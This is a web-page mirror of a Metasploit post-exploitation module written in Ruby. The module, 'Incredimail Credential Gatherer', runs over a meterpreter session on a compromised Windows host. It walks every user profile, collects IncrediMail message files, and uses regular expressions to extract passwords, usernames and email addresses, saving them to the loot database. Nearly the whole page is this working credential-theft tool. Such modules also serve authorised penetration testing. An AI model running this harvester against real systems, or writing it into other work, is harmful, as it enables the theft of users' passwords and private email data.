Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/incredimail.rb
21550 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5
class MetasploitModule < Msf::Post

6


7
  include Msf::Post::File

8
  include Msf::Post::Windows::UserProfiles

9
  include Msf::Post::Windows::Packrat

10


11
  ARTIFACTS =

12
    {

13
      application: 'incredimail',

14
      app_category: 'emails',

15
      gatherable_artifacts: [

16
        {

17
          filetypes: 'email_logs',

18
          path: 'LocalAppData',

19
          dir: 'IM',

20
          artifact_file_name: 'msg.iml',

21
          description: 'IncrediMail sent and received emails',

22
          credential_type: 'text',

23
          regex_search: [

24
            {

25
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',

26
              extraction_type: 'credentials',

27
              regex: [

28
                '(?i-mx:password.*)',

29
                '(?i-mx:username.*)'

30
              ]

31
            },

32
            {

33
              extraction_description: 'searches for Email TO/FROM address',

34
              extraction_type: 'Email addresses',

35
              regex: [

36
                '(?i-mx:to:.*)',

37
                '(?i-mx:from:.*)'

38
              ]

39
            }

40
          ]

41
        }

42
      ]

43
    }.freeze

44


45
  def initialize(info = {})

46
    super(

47
      update_info(

48
        info,

49
        'Name' => 'Incredimail Credential Gatherer',

50
        'Description' => %q{

51
          This module searches for Incredimail credentials on a Windows host.

52
        },

53
        'License' => MSF_LICENSE,

54
        'Author' => [

55
          'Kazuyoshi Maruta',

56
          'Daniel Hallsworth',

57
          'Barwar Salim M',

58
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org

59
        ],

60
        'Platform' => ['win'],

61
        'SessionTypes' => ['meterpreter'],

62
        'Notes' => {

63
          'Stability' => [CRASH_SAFE],

64
          'Reliability' => [],

65
          'SideEffects' => []

66
        }

67
      )

68
    )

69


70
    register_options(

71
      [

72
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

73
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

74
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

75
        # enumerates the options based on the artifacts that are defined below

76
        OptEnum.new('ARTIFACTS', [

77
          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|

78
                                                          k[:filetypes]

79
                                                        end.uniq.unshift('All')

80
        ])

81
      ]

82
    )

83
  end

84


85
  def run

86
    print_status('Filtering based on these selections:  ')

87
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

88
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

89
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

90


91
    # used to grab files for each user on the remote host

92
    grab_user_profiles.each do |userprofile|

93
      run_packrat(userprofile, ARTIFACTS)

94
    end

95


96
    print_status 'PackRat credential sweep completed'

97
  end

98
end

99


100